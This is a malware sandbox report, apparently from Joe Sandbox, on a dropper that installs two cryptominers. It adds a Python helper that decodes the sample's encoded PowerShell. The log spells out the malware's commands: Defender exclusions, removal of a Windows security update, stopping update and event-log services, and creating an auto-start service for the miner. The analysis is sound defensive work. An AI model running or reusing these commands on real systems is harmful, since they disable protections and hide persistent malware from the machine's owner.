Source: C:\Windows\System32\dialer.exe | Code function: 45_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,45_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe | Code function: 52_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E9917528C8 NtEnumerateValueKey,NtEnumerateValueKey,59_2_000002E9917528C8
Source: C:\Windows\System32\lsass.exe | Code function: 73_2_00000213BDCE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,73_2_00000213BDCE253C
Source: C:\Windows\System32\lsass.exe | Code function: 73_2_00000213BDCE202C NtQuerySystemInformation,StrCmpNIW,73_2_00000213BDCE202C
Source: C:\Windows\System32\dwm.exe | Code function: 75_2_0000026DB16728C8 NtEnumerateValueKey,NtEnumerateValueKey,75_2_0000026DB16728C8
Source: Joe Sandbox ViewDropped File: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Kawpow new.exe 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xmr new.exe D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
Source: kx new.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engineClassification label: mal100.spyw.evad.winEXE@108/17@0/0
Source: C:\Windows\System32\dialer.exe | Code function: 45_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\dialer.exe | Code function: 52_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,Sleep
Source: C:\Windows\System32\dialer.exe | Code function: 45_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1736:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
Source: C:\Users\user\Desktop\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe
Source: kx new.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kx new.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\kx new.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: kx new.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\kx new.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit (graph_0-82)
Source: unknown | Process created: C:\Users\user\Desktop\kx new.exe "C:\Users\user\Desktop\kx new.exe"
Source: C:\Users\user\Desktop\kx new.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kx new.exe | Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\kx new.exe | Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
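The first powershell.exe entry above passes its script via -EncodedCommand. The Python below is an added triage helper written for this page, not Joe Sandbox output and not code from the sample: it decodes that value (Base64 over the UTF-16LE bytes of the script), removes the `<# #>` block comments the sample drops between tokens so that neither the Base64 text nor the raw bytes contain a contiguous cmdlet name, and pulls out the Defender exclusion paths. The Base64 string is copied from the entry above; the helper names and regular expressions are this example's own.

```python
import base64
import re

# Encoded command line copied from the report's "Process created" entry for
# powershell.exe -EncodedCommand (wrapped here for readability).
ENCODED_COMMAND = (
    "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIA"
    "ZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMA"
    "PgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQA"
    "aAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIA"
    "bwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQA"
    "ZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMA"
    "PgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMA"
    "PgA="
)

# PowerShell block comments <# ... #>. The sample sprinkles short random ones
# between tokens, so a substring search for "Add-MpPreference -ExclusionPath"
# on the decoded text fails until they are removed.
_BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def decode_encoded_command(b64: str) -> str:
    """Decode a powershell.exe -EncodedCommand value.

    -EncodedCommand is Base64 over the UTF-16LE encoding of the script, which
    is why every second byte of the decoded blob is 0x00 and the Base64 text
    is full of 'A' characters.
    """
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not a UTF-16LE -EncodedCommand payload")
    return raw.decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove <# #> comments and collapse the whitespace they leave behind."""
    cleaned = _BLOCK_COMMENT.sub(" ", script)
    return " ".join(cleaned.split())


def defender_exclusions(script: str) -> list[str]:
    """Return the -ExclusionPath arguments of an Add-MpPreference call.

    Handles a bare path and the @(...) array form seen in this sample; returns
    an empty list when the script does not call Add-MpPreference.
    """
    if not re.search(r"\bAdd-MpPreference\b", script, re.IGNORECASE):
        return []
    m = re.search(r"-ExclusionPath\s+(@\(([^)]*)\)|(\S+))", script, re.IGNORECASE)
    if not m:
        return []
    body = m.group(2) if m.group(2) is not None else m.group(3)
    return [p.strip().strip("'\"") for p in body.split(",") if p.strip()]


def triage(b64: str) -> dict:
    """Decode, deobfuscate and summarise one -EncodedCommand value."""
    script = decode_encoded_command(b64)
    cleaned = strip_block_comments(script)
    return {
        "decoded": script,
        "cleaned": cleaned,
        "comment_junk": _BLOCK_COMMENT.findall(script),
        "exclusions": defender_exclusions(cleaned),
    }


if __name__ == "__main__":
    result = triage(ENCODED_COMMAND)
    for key, value in result.items():
        print(f"{key:13}: {value}")
```

Decoded, the script excludes the whole user profile and the system drive from Defender scanning, which is broader than the plaintext Add-MpPreference lines the two dropped executables run later (those add the user profile, ProgramData and the .exe extension).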
Source: C:\Users\user\Desktop\kx new.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Users\user\Desktop\kx new.exe | Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\Desktop\kx new.exe | Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
